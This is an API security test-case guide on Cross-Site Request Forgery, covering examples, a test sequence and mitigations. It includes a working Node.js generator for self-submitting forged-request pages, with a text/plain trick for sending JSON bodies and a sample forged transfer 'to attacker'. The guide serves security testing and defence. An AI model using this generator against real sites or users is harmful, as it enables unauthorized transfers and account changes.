Version: v1

CSRF (Cross-Site Request Forgery)


What is it?

Cross-Site Request Forgery (CSRF) occurs when an attacker tricks an authenticated user’s browser into sending a request the user never intended, so that the API receives it with the user’s existing session or credentials attached.

This vulnerability primarily affects APIs that rely on credentials the browser adds to every request on its own, such as session cookies (and, less commonly, HTTP Basic credentials or client certificates). An API that only accepts credentials in an explicit Authorization header is not reachable this way, because a cross-origin page cannot make the browser add that header.

Because the forged request is well-formed and carries valid credentials, the API cannot distinguish it from a legitimate user action, and the attacker can perform sensitive operations on the user’s behalf.

CSRF is particularly critical for state-changing operations and can lead to unauthorized transactions, account modifications, or privilege abuse. The attacker generally cannot read the response, so the impact is the side effect of the request, not data disclosure.

What are specific examples?

  • A malicious website triggering a POST /transfer request using the victim’s active session
  • APIs accepting state-changing requests without a CSRF token
  • Session cookies issued without a SameSite attribute (or with SameSite=None)
  • Missing validation of the Origin or Referer header on state-changing requests
  • Sensitive actions exposed via browser-accessible endpoints, including GET endpoints that change state
  • CSRF protections implemented only in the frontend (for example a token the JavaScript client adds) that the API does not actually verify

Test case FAQs

When is this test case applicable?

  • APIs using cookie-based authentication
  • Browser-accessible endpoints
  • Endpoints performing state-changing operations (POST, PUT, DELETE, and any GET that changes state)
  • Applications whose browser clients are expected to interact across origins

How does it work?

Prerequisites

  • Authenticated session (typically via cookies)
  • Ability to simulate cross-origin requests (a page hosted on a second origin, or a crafted request carrying a foreign Origin header)
  • Identification of state-changing endpoints

Test sequence

  1. Identify endpoints relying on cookie-based authentication and note the session cookie’s SameSite attribute
  2. Send forged cross-origin requests without CSRF tokens (for example from an auto-submitting form on another origin)
  3. Replay requests with missing or invalid:
    • CSRF tokens
    • Origin/Referer headers
  4. Analyze whether the request is accepted and executed
  5. Validate whether a sensitive state change occurred without user intent
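The forged cross-origin request of step 2 is normally delivered by a page on an attacker-controlled origin. The following is an added example, not code from the original page or from any project it describes: a small Node.js generator for that proof-of-concept page, together with a preview of the body the browser will send. The target URL and field names are illustrative assumptions. It also shows the general case beyond the page's POST /transfer example: which content types a plain form can send without a CORS preflight, the text/plain trick for feeding a JSON body to an API that does not enforce Content-Type, and why PUT/DELETE cannot be forged from a form at all.

```javascript
// Added example (not the page's or any project's code): generates the proof-of-concept
// page a tester hosts on an attacker-controlled origin to forge a cross-origin
// state-changing request from a logged-in victim's browser. The target URL and
// field names below are illustrative assumptions.

// A plain HTML form can only submit these three content types; none of them
// triggers a CORS preflight, so the browser sends the request with cookies attached.
const FORM_ENCTYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// Forms only know GET and POST; a PUT/DELETE endpoint cannot be hit from a form,
// and a cross-origin fetch() with those methods would be preflighted.
const FORM_METHODS = new Set(["GET", "POST"]);

function escapeAttr(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// Hidden inputs for the form. With text/plain the browser emits `name=value`
// verbatim, so a JSON API that does not check Content-Type can be fed a JSON body:
// the whole document goes into the field name and the value closes a dummy key,
// leaving e.g. {"to":"attacker","amount":1000,"pad":"="} on the wire.
function forgedFields(fields, enctype) {
  if (enctype !== "text/plain") return Object.entries(fields);
  const json = JSON.stringify({ ...fields, pad: "" }); // ...,"pad":""}
  const name = json.slice(0, -2);                       // ...,"pad":"
  return [[name, '"}']];
}

// The request body the browser will actually send, for checking the PoC offline.
function previewBody(fields, enctype) {
  const pairs = forgedFields(fields, enctype);
  if (enctype === "text/plain") return pairs.map(([n, v]) => `${n}=${v}\r\n`).join("");
  if (enctype === "application/x-www-form-urlencoded") return new URLSearchParams(pairs).toString();
  throw new Error("multipart bodies carry a random boundary; inspect them in the browser");
}

function buildCsrfPoc({ target, method = "POST", enctype = "application/x-www-form-urlencoded", fields }) {
  if (!FORM_ENCTYPES.has(enctype)) throw new Error(`forms cannot send ${enctype}`);
  if (!FORM_METHODS.has(method.toUpperCase())) throw new Error(`forms cannot send ${method}`);
  const inputs = forgedFields(fields, enctype)
    .map(([n, v]) => `    <input type="hidden" name="${escapeAttr(n)}" value="${escapeAttr(v)}">`)
    .join("\n");
  // The form submits itself on load; the victim only has to open the page.
  return `<!doctype html>
<html><body>
  <form id="csrf" action="${escapeAttr(target)}" method="${escapeAttr(method)}" enctype="${enctype}">
${inputs}
  </form>
  <script>document.getElementById("csrf").submit();</script>
</body></html>`;
}

// Constructed usage: forge a JSON transfer against an assumed victim endpoint.
const pocPage = buildCsrfPoc({
  target: "https://api.example.test/transfer", // assumption, not a real endpoint
  enctype: "text/plain",
  fields: { to: "attacker", amount: 1000 },
});
```

Host the generated page on a second origin and open it in a browser that holds the victim session; the endpoint is vulnerable if the state change happens. An API that rejects bodies whose Content-Type is not application/json defeats the text/plain trick, so record the Content-Type the API actually enforces as part of step 4.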

Success/Failure indications

  • Failure (vulnerable):

    • State-changing request succeeds without CSRF token
    • API accepts requests from untrusted origins
    • Missing or ignored Origin/Referer validation
  • Success (secure):

    • Requests rejected without valid CSRF token
    • Origin/Referer properly validated
    • SameSite cookie protections enforced

What is the solution?

  • Implement anti-CSRF tokens for all state-changing operations (a synchronizer token bound to the session, or a signed double-submit cookie), and compare them in constant time
  • Enforce SameSite cookie attributes (Strict or Lax); note that Lax still sends the cookie on top-level GET navigations, so no GET endpoint may change state
  • Validate the Origin header against an allow-list, falling back to Referer when Origin is absent, and reject state-changing requests that carry neither
  • Prefer token-based authentication (Authorization headers) over cookies: the browser never adds that header on its own, but the client must then protect the token from XSS
  • Avoid exposing sensitive operations to browser contexts when unnecessary
  • Ensure CSRF protections are enforced server-side, independently of anything the frontend does
